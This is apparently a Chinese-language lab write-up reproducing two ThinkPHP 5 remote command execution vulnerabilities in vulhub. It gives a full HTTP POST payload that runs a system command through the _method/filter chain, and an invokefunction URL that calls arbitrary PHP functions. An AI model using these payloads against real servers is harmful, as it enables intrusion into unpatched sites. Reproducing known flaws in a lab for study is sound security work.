THINKPHP5 远程命令执行

漏洞背景

前台有回显RCE

• 框架介绍：ThinkPHP是一款运用极广的PHP开发框架。
• 漏洞引入：
  1.其版本5中，由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞。
  2.其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。

漏洞特征

网站指纹

本地复现

thinkphp/5.0.23-rce
直接post就可以执行命令。。。。好无聊啊。。。

POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

thinkphp/5-rce

直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1，即可执行phpinfo

总结

1. 无聊的一天。。。

参考

• vulhub:
  https://github.com/vulhub/vulhub/blob/master/thinkphp/5.0.23-rce/README.zh-cn.md,
  https://github.com/vulhub/vulhub/blob/master/thinkphp/5-rce/README.zh-cn.md